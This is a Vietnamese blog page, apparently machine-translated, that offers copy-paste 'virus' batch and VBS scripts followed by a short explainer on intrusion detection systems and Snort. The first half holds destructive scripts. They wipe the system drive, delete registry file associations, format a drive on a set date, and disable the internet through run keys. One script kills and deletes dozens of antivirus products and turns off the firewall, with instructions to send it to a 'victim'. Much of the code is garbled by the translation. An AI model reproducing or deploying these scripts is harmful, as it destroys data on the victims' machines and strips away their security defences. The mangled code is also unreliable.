Virus Viết


   
IMP. Lưu ý >> tôi không chịu trách nhiệm cho bất kỳ thiệt hại hoặc báo cáo lỗi trong máy tính của bạn làm điều đó như nguy cơ của riêng ur. . Những mã hóa chỉ cho khái niệm kiến thức 


Tất cả Scripts Dưới đây là sao chép rồi past vào notepad 


>> Virus này Xóa Tất cả các nội dung của một ổ ...
echo off
del% SystemDrive% \ * * / f / s / q.
Shutdown - r -f -t 00 Save The Trên Mã một file .bat



>> Disable Internet vĩnh viễn
Save As Một File bat vangecho off> c: windowswimn32.bat vang vỡ ra >> c: windowswimn32.bat vang ipconfig / release_all >> c: windowswimn32.bat vang cuối >> c: windowswimn32.bat reg thêm hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun / v WINDOWsAPI / t REG_SZ /dc:windowswimn32.bat / f reg thêm rsionrun hkey_current_usersoftwaremicrosoftwindowscurrentve / v CONTROLexit / t REG_SZ /dc:windowswimn32.bat / f tiếng vang Have You Been NGƯƠIQUYHAU! PAUSE










>> Các virus đơn giản nhất Để Lòng Window

echo off
Del C: \ * * | y. Lưu Nó Như Anything.bat




>> Điều này sẽ Tai nạn máy tính Ur

Option Explicit Dim WSHShell Set WSHShell = Wscript.CreateObject ( "Wscript.Shell") Dim x Đối với x = 1-100,000,000WSHShell.Run "Tourstart.exe" Tiếp Lưu Nó Như Anything.vbs Nó Chỉ trình với Windows XP













>> Xóa khóa Registry tập tin [CHÚ Ý NÀY LÀ NGUY HIỂM !! SỬ DỤNG AT RISK]

Điều này sẽ xóa các tập tin registry key, sau đó vòng một tin nhắn (KHÔNG THỂ THU HỒI TỪ) * Mã số: - ECHO OFF BẮT ĐẦU reg delete HKCR / .exe BẮT ĐẦU reg delete HKCR / Dll BẮT ĐẦU reg delete HKCR / * : MESSAGE ECHO máy tính của bạn đã được fcked. Có một ngày tốt đẹp. GOTO ĐIỆP











>> Sổ ghi chép Endless

* Điều này sẽ bật lên các tập sách vô tận cho đến khi máy tính đóng băng và bị treo * Code: - ECHO off : đầu BẮT ĐẦU% SystemRoot% \ system32 \ notepad.exe GOTO đầu








>> Bomb Virus

Sao chép Dán Có Nếu ngày%% NEQ 2009/11/25 thoát goto dạng E: / y> nul : lối thoát và tiết kiệm Nó Như Anything.bat Lưu ý: - Bạn có thể thay đổi Date (2009/11 / 25) Trong Virus And The Location (định dạng E:) Mở mà Nó không hành động của Virus sẽ Take Effect On ngày đó











>> Điên mũ khóa

* Đây không ngừng biến mũ khóa và tắt rất nhanh liên tục * Code: - Đặt wshShell = wscript.CreateObject ( "WScript.Shell") làmwscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" loop









>> Endless Nhập
* này liên tục làm cho nó để nhập vào nút đang được ép continuesly * Code: - Đặt wshShell = wscript.CreateObject ( "WScript.Shell") làm wscript.sleep 100 wshshell.sendkeys "~ (nhập)" loop









>> Endless Backspace

* Điều này làm cho nó để các phím backspace là liên tục được nhấn * Code: - MsgBox "Hãy trở lại một vài bước" Đặt wshShell = wscript.CreateObject ( "WScript.Shell") làm wscript.sleep 100 wshshell.sendkeys "{bs}" loop










Quan hệ tình dục nào là máy tính của bạn?

-> Mở notepad
-> mã bản sao

. CreateObject ( "SAPI.SpVoice") nói "Tôi yêu bạn" -> n dán vào Notepad -> save as> love.vbs -> nhấn đúp vào nó




bàn phím của bạn Disco nhẹ

Thủ thuật này chỉ làm cho đèn bàn phím của bạn làm sàn nhảy.
Các kịch bản tôi đang chia sẻ với bạn, khi thực hiện làm cho Caps, Num và đèn flash đèn Scroll Lock một cách nhịp nhàng mát mẻ! 1.This đoạn mã làm cho ur bàn phím một sàn nhảy live .. Đặt wshShell = wscript.CreateObject ( "WScript.Shell") làmwscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" wshshell.sendkeys "{} NumLock" wshshell.sendkeys "{} ScrollLock" vòng 2 .Đây là một làm cho nó trông giống như một chuỗi ánh sáng .... Đặt wshShell = wscript.CreateObject ( "WScript.Shell") làmwscript.sleep 200 wshshell.sendkeys "{CAPSLOCK}" wscript.sleep 100 wshshell.sendkeys "{} NumLock " wscript.sleep 50wshshell.sendkeys" {ScrollLock} " loop Hướng dẫn: * dán bất kỳ của hai mã trên notepad * Save as" AnyFileName ".vbs * Chạy file* Để dừng, khởi động công việc quản lý và sau đó theo" Processes "kết thúc" wscript.exe " tôi hy vọng u sẽ thích nó ..


Làm thế nào để Vô hiệu hoá Victim Antivirus.

Mở Notepad Sao chép và Dán nó Để Notepad @ echo off rem - rem vĩnh viễn Kill Anti-Virus net stop "Security Center" netsh chế độ tường lửa đặt opmode = vô hiệu hoá tskill / A av * tskill / Một ngọn lửa * tskill / A chống * cls tskill / Một điệp viên * tskill / A BullGuard tskill / A PersFw tskill / A KAV * tskill / A ZoneAlarm tskill / A SAFEWEB cls tskill / một tiền đồn tskill / A nv * tskill / A nav * tskill / A F - * tskill / A ESAFE tskill / A cle cls tskill / A BlackICE tskill / A def * tskill / A kav tskill / A kav * tskill / A trung bình *tskill / A tro * cls tskill / A aswupdsv tskill / A ewid * tskill / Một bảo vệ * tskill / A guar * tskill / A gcasDt * tskill / A msmp * cls tskill / A mcafe * tskill / A mghtml tskill / A msiexec tskill / Một tiền đồn tskill / A isafe tskill / A zap * cls tskill / A zauinst tskill / A UPD *tskill / A zlclien * tskill / A minilog tskill / A cc * tskill / A norton * cls tskill / A au norton * tskill / A ccc * tskill / A npfmn * tskill / A Loge * tskill / A nisum * tskill / A issvc tskill / A tmp * cls tskill / A TMN * tskill / A pcc * tskill / A cpd * tskill / Một cửa sổ pop * tskill / A pav * tskill / A padmin cls tskill / A gấu trúc * tskill / A avsch * tskill / A Sche * tskill / A syman * tskill / virus A * tskill / Một cõi * clstskill / sweep * tskill / A quét * tskill / Một quảng cáo- * tskill / A an toàn * tskill / A avas * tskill / Một quy * cls tskill / A offg * del / Q / FC: \ Program Files \ alwils ~ 1 \ avast4 \ *. * exe \ Program Files \ Lavasoft \ Ad-awa ~ 1 \ *: del / Q / FC. del / Q / FC: \ Program Files \ Kasper ~ 1 \ *. exe cls del / Q / FC: \ Program Files \ trojan ~ 1 \ *. exe del / Q / FC: \ Program Files \ f-prot95 \ * .dll del / Q / FC: \ Program Files \ tbav \ * dat. cls del / Q / FC: \ Program Files \ avpersonal \ * VDF. del / Q / FC:. \ Program Files \ Norton ~ 1 \ * CNT del / Q / FC: \ Program Files \ Mcafee \ *. * cls del / Q / FC: \ Program Files \ Norton ~ 1 \ Norton ~ 1 \ Norton ~ 3 \ *. * del / Q / FC: \ Program Files \ Norton ~ 1 \ Norton ~ 1 \ speedd ~ 1 \ *. * del / Q / FC: \ Program Files \ Norton ~ 1 \ Norton ~ 1 \ *. * del / Q / FC: \ Program Files \ Norton ~ 1 \ *. * cls del / Q / FC: \ Program Files \ avgamsr \ *. exe del / Q / FC: \ Program Files \ avgamsvr \ *. exe del / Q / FC: \ Program Files \ avgemc \ * exe. cls del / Q / FC: \ Program Files \ avgcc \ *. exe del / Q / FC: \ Program Files \ avgupsvc \ *. exe del / Q / FC: \ Program Files \ GRISOFT del / Q / FC: \ Program files \ nood32krn \ *. exe del / Q / FC: \ Program files \ nood32 \ *. exe cls del / Q / FC: \ Program files \ nod32 del / Q / FC: \ Program files \ nood32 del / Q / FC : \ Program Files \ kav \ *. exe del / Q / FC: \ Program Files \ kavmm \ *. exe del / Q / FC: \ Program Files \ Kaspersky \ *. * cls del / Q / FC: \ Program Files . \ ewidoctrl \ * exedel / Q / FC: \ Program Files \ vệ \ *. exe del / Q / FC: \ Program Files \ Ewido \ *. exe cls del / Q / FC: \ Program Files \ pavprsrv \ * .exedel / Q / FC: \ Program Files \ pavprot \ *. exe del / Q / FC: \ Program Files \ avengine \ *. exe cls del / Q / FC:. \ Program Files \ apvxdwin \ * exe del / Q / FC: \ Program Files \ Webproxy \ *. exe del / Q / FC:. \ Program Files \ software panda \ * * rem - Bây giờ Lưu đoạn mã này là .bat và gửi cho nạn nhân :)
>> Nhiệm vụ Giết

echo off bắt đầu calc tskill msnmsgr tskill firefox tskill iexplore tskill LimreWire tskill explorer tskill explorer tskill explorer tskill explorer tskill explorer tạm dừng






















lưu tập tin .bat này và gửi và tiêu diệt các nạn nhân & k! ll Xử! ng hệ thống!


>> Loại Mã trong notepad

echo off
shutdown -r -f -t 00 >> Mẫu số tắc -s tắt máy tính. -l Logs khỏi người dùng hiện hành. -t Nn Cho biết thời gian chậm trễ, trong vài giây, trước khi thực hiện hành động. -c "messagetext" Hiển thị một thông điệp trong cửa sổ System Shutdown. Tối đa 127 ký tự có thể được sử dụng. Thông điệp này phải được đặt trong dấu ngoặc kép. -f Buộc bất kỳ ứng dụng đang chạy để tắt. -r Khởi động lại máy tính. .. !! ..!



















>> Popping CD Drives

* Điều này sẽ làm cho các đĩa CD ổ đĩa liên tục bật ra * Code: - Set oWMP = CreateObject (? "WMPlayer.OCX.7) Set colCDROMs = oWMP.cdromCollection làm nếu colCDROMs.Count> = 1 sau đó For i = 0 đến colCDROMs.Count - 1 colCDROMs.Item (i) .Eject TiếpFor i = 0 đến colCDROMs.Count - 1 colCDROMs.Item (i) .Eject Tiếp Cuối Nếu wscript.sleep 100 vòng lặp















>> Để nói chuyện máy của bạn

mở một tập tin văn bản trong notepad và viết: Dim msg, SAPI msg = InputBox ( "Nhập văn bản của bạn", "Nói chuyện với nó") Đặt SAPI = CreateObject ( "sapi.spvoice") sapi.Speak msg lưu các tập tin có phần mở rộng (* .vbs), nó sẽ tạo ra một tập tin VBScript. nó sẽ nhắc bạn cho một văn bản khi u mở tập tin, nhập văn bản và nhấn ok. " u sẽ nghe thấy bây giờ những gì u gõ .. này làm việc trong xp, vista, win7 cũng có. thưởng thức !!!


NNB:Virus Viết

    Hệ thống phát hiện xâm            nhập (IDS)


>> hôm nay có chút thời gian nên viết bài này các bạn tự nghiên cứu và xem thêm trên google!!!!!
Một hệ thống cố gắng xác định những nỗ lực để hack hoặc đột nhập vào một hệ thống máy tính hoặc lợi dụng nó. IDS có thể giám sát các gói tin qua các mạng, các file hệ thống màn hình, file màn hình đăng nhập, hoặc thiết lập các hệ thống lừa dối mà cố gắng để bẫy hacker. Hệ thống máy tính đã trở nên dễ bị tổn thương hơn để xâm nhập hơn bao giờ hết. Intrusion Detection là một công nghệ bảo mật cho phép không chỉ phát hiện các cuộc tấn công, nhưng cũng cố gắng để cung cấp thông báo về các cuộc tấn công mới không lường trước được do khác thành phần. Phát hiện xâm nhập là một thành phần quan trọng của một hệ thống an ninh, và nó bổ sung các công nghệ bảo mật khác. >> Làm thế nào để một tác phẩm IDS? Trong khi có một số loại IDS, những loại phổ biến nhất làm việc như nhau. Họ phân tích lưu lượng mạng và file log mẫu nhất định. Những loại mẫu mà bạn có thể yêu cầu? Trong khi một bức tường lửa liên tục sẽ chặn một hacker từ kết nối với một mạng, hầu hết các bức tường lửa không bao giờ cảnh báo cho người quản trị. Các quản trị viên có thể nhận thấy nếu anh / cô ấy sẽ kiểm tra bản ghi truy cập của các bức tường lửa, nhưng đó có thể là vài tuần hoặc thậm chí vài tháng sau vụ tấn công. Đây là nơi mà một IDS đi vào chơi. Những nỗ lực để vượt qua thông qua các bức tường lửa được ghi lại và IDS sẽ phân tích log của nó. Tại một số điểm trong bản ghi sẽ có một số lượng lớn các yêu cầu-từ chối mục. Một IDS sẽ cờ các sự kiện và cảnh báo cho người quản trị. Các quản trị viên sau đó có thể xem những gì đang xảy ra ngay sau khi hoặc thậm chí trong khi các cuộc tấn công vẫn đang diễn ra. Điều này cho phép người quản trị lợi thế là khả năng phân tích các kỹ thuật được sử dụng, nguồn gốc của các cuộc tấn công, và các phương pháp được sử dụng bởi các hacker. >> Sau đây là các loại hệ thống phát hiện xâm nhập: - 1) Host-Based Intrusion Detection System (HIDS) : phát hiện xâm nhập máy chủ dựa trên hệ thống hoặc HIDS được cài đặt như là đại lý trên một máy chủ. Các hệ thống phát hiện xâm nhập có thể nhìn vào hệ thống và ứng dụng đăng nhập các tập tin để phát hiện bất kỳ hoạt động kẻ xâm nhập. 2) Network-Based Intrusion Detection System (NIDS): Những IDS phát hiện các cuộc tấn công bằng cách bắt các gói tin mạng phân tích. Lắng nghe trên một đoạn mạng hoặc switch, một IDS dựa trên mạng có thể giám sát lưu lượng mạng ảnh hưởng đến nhiều host được kết nối với các phân đoạn mạng, do đó bảo vệ các host. IDS dựa trên mạng thường bao gồm một bộ cảm biến đơn mục đích hoặc máy chủ đặt tại các điểm khác nhau trong mạng. . Những lưu lượng mạng đơn vị theo dõi, thực hiện phân tích địa phương lưu lượng truy cập và báo cáo các cuộc tấn công vào một giao diện điều khiển trung tâm quản lý >> Một số chủ đề quan trọng đi kèm theo phát hiện xâm nhập được như sau: - 1) Chữ ký: Chữ ký là mô hình mà bạn tìm kiếm bên trong một dữ liệu gói. Một chữ ký được sử dụng để phát hiện một hoặc nhiều loại tấn công. Ví dụ, sự hiện diện của "kịch bản / iisadmin" trong một gói tin đi đến máy chủ web của bạn có thể chỉ ra một hoạt động kẻ xâm nhập. Chữ ký có thể có mặt trong các phần khác nhau của một gói dữ liệu tùy thuộc vào bản chất của các cuộc tấn công. 2) Cảnh báo: Cảnh báo bất kỳ loại người dùng thông báo của một hoạt động kẻ xâm nhập. Khi một IDS phát hiện một kẻ xâm nhập, nó có để thông báo cho quản trị bảo mật về điều này bằng các thông báo. Alerts có thể ở dạng cửa sổ pop-up, đăng nhập vào một giao diện điều khiển, gửi e-mail và như vậy. Thông báo cũng sẽ được lưu trữ trong các tập tin đăng nhập cơ sở dữ liệu hoặc nơi họ có thể được xem sau này của các chuyên gia an ninh. 3) Logs: Các thông điệp log thường được lưu trong các tin nhắn file.Log có thể được lưuhoặc trong văn bản hoặc định dạng nhị phân. 4) Báo động sai: báo động sai là cảnh báo được tạo ra do một dấu hiệu cho thấy đó không phải là một hoạt động kẻ xâm nhập. Ví dụ, máy chủ nội bộ sai đôi khi có thể phát sóng các tin nhắn mà gây ra một quy tắc dẫn đến thế hệ của một cảnh báo giả. Một số router, giống như các router Linksys nhà, tạo ra rất nhiều cảnh báo liên quan UPnP.Để tránh các báo động sai, bạn phải thay đổi và điều chỉnh quy tắc mặc định khác nhau. Trong một số trường hợp, bạn có thể cần phải vô hiệu hóa một số các quy tắc để tránh báo động sai. 5) Bộ cảm biến: Các máy tính trên đó một hệ thống phát hiện xâm nhập đang chạy cũng được gọi là cảm biến trong văn học bởi vì nó được sử dụng để "cảm giác" mạng.
>> Snort: 

Snort là một hệ thống phát hiện xâm nhập mạng lưới rất linh hoạt mà có một lượng lớn các quy tắc cấu hình trước. Snort cũng cho phép bạn ghi tập hợp quy tắc của riêng bạn. . Có một số danh sách gửi thư trên internet, nơi mọi người chia sẻ quy tắc snort mới có thể đối phó với các cuộc tấn công mới nhất của Snort là một ứng dụng bảo mật hiện đại có thể thực hiện ba chức năng sau: * Nó có thể phục vụ như là một gói sniffer. * Nó có thể làm việc như một gói logger. * Nó có thể làm việc như một mạng dựa trên hệ thống phát hiện xâm nhập (NIDS).




CÔNG CỤ:
Smooth-Sec 3,0 Intrusion Detection System

Smooth-Sec là một IDS nhẹ và hoàn toàn sẵn sàng / IPS (Intrusion Detection / Prevention System) phân phối Linux dựa trên Debian 7 (khò khè), có sẵn cho kiến trúc 32 và 64 bit. Việc phân phối bao gồm các phiên bản mới nhất của Snorby, Snort, Suricata, PulledPork và chuồng. Một quá trình cài đặt dễ dàng cho phép triển khai một hoàn IDS / IPS hệ thống trong vòng vài phút, thậm chí cho người mới bắt đầu an ninh với kinh nghiệm tối thiểu Linux.


  • Debian Wheezy 7 dựa
  • 32 và 64 bit iso có sẵn. Snorby V 2.6.2
  • Snort V 2.9.4.6
  • Suricata V 1.4.3
  • Chuồng V 0.1.0
  • PulledPork V 0.6.1

Download:







Hệ thống phát hiện xâm nhập (IDS)

 
Nhoxnamby © 2015 |Blog content
Share Emphasis